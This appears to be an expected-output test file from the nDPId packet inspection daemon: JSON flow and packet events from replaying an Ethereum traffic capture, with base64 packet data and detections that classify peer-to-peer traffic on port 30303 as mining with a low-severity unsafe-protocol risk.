01977{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1578508364773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGASMuzZAAC8R8ro2JKDTwKgBuHZfdl8EeHOhfS8\/VKeU4xriCeJZNmbyiR29m3N42\/uIKvLbiJlgdyaSwrO2BgcDcenrD2C97edthDBouwifboHgE3u3hLHcQi8I2aNx02z5+NzOkszQMNgplhV2V\/wYwtE8G8IvYQ3cAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2E0WGPAYLDUILDULhAQhNvCoDxAncltx4bh9WffZwzBdE\/9xF06wXJo57MMUhoLLSI90CIePrV\/tYmYiKEiyDSrJDYOlCFHmZ3pqDCwfhNhGoMJ6iCdn2Cdn24QH6QBf7Np\/9Y+eiOrugFzIsIhVcNcp\/OYct+34QkqEfvlXbuNfWnoEs1IzwGORRl6zR7xwwZW1+45dnGnJxxFET4TYTAnuIugnZfgnZfuECuDYcQjm3wJMglum1qnPXPBozHysGZ9VxiaJNnx\/kw7dAhqZoxI6CdfBdLdPaGhgI412g7XwrxymiHNjtEpybV+E2Eb+UAtIJO1oJO1rhA0poa9\/bt4+0jT09hYxZaiqxOAEVZVX85K1bHaaj2apLnzPtOIrzfKJurvUFlKLQJKx6TBvhnKvyePnNB3SaoJvhNhKSEZZ+Cdl+Cdl+4QGhplCUf+0AxOYQ0\/JiK92IrqpcWVPF77+npw8uqJp6XsPoEUGJFdkdpzDehQ5oaTj67fZbU0xSOgleTToHaYQj4TYSygMxlgsNQgsNQuEAJaLOKzWf\/o+pIN3tGz2TU0Jj7rRUsEu\/g\/J\/izFMRqT2L21hSkEIu4pwcRIudbxWCEi7R3jpR3Qx72SJ7sDxL+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhNFhtVyCw1CCw1C4QGNRrcySTkrIddsTkghzBE5yaZovlz823kaODYnxRULrhcdtfhDSmheK1rkdzx6MLgmWRkcqk5yLSRXbV7Sa9hv4TYSUZnN9gnQ9gnQ9uECK3QCjct4kYgqQwECFpzDV6FidxjszhMNuNu5KPckeHeVnNGRrmrvdWVqSm7NdhSk\/GBSTMV30P4Rv7pq1hSjo+E2ENL1ESYILzYILzbhAFgxun0r0zdyAC5SZb67xXu\/2hxGmSEaQZz1XosQe6902lrVgE71jlymkTkVmiGnjo+wcj5gGrpBHOVgGl5DUX\/hNhFCeJFKCdl+Cdl+4QPL7djWpmmTz8plIeSEj91S2rY+aeiMQAn6m9zZuLcDbcgnpEzw4Bbj2GboSA\/6fD1Ct0nUU6+rf7UzNqpXAqYL4TYRvYnEBgnZfgnZfuED0pW7OSkAUUx9PeHXwwyf7mqpd70LmGPSseSc9VRhmuql9pusBMDKDEfCCcSaAIW2BnfDoTpS113ylm2TbVhfWhF4WIGA="} 00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1578508364773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGAF0uzdAAC8R9dE2JKDTwKgBuHZfdl8BYMxaEf6gK86OMmqC0hj8YCjT4Kxyd9QhLNhUWv84IcoZEEM5WLaEl0iNjPoH5MGkDBtHCCGzykqH2IyxlA4UZhPcyDumXz\/v4mlSvZfRB2yOu5AYhwCSwbpUWhfp9lpeKanwAQT49Pjt+E2EdbUsoIIrq4Irq7hAjNB3wOfdUkch\/RymD8COogkRfmtGHDZ3JfVp7qPL0g95b9d6Og4eqk7Oc5yCXUjsPCBRZNV\/OEkCcWVLTRMhqvhNhDb\/yRuCdl+Cdl+4QBkaEptJyzZcwNghsa\/yev+qS1D63n8u0YIQqdir49AX7Q7OxcqumEYHw1gpXkn8\/0NtWmRXiIMnyNsmLKeGv434TYQj3LNggnZggnZguEA4nJBTYkTqav4+upLVWlu+s2ggu8pFBH5psWcuz5eAhJOcvW7tSncGp+spv2HIMW\/j4SK81taE+f1zSPKQGx8uhF4WIGA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1578508364776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364776,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc6zkAAEARbFTAqAG40WGPAXZfw1AAiAuoYX\/X5Uw4lffkPNHSCMW6SrDFB88ojJJssa\/u4MiJ7ftgjBcFdVPuw+tvNym45804Q6\/uLh0oQsOr0riQp0FxmC7+mATc88CsFLix8wyPMseFlTK290MHGwkPORWZli5hAQHdBMuEfwAAAYJ2X4J2X8mE0WGPAYLDUICEXhYgYAU="} 00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 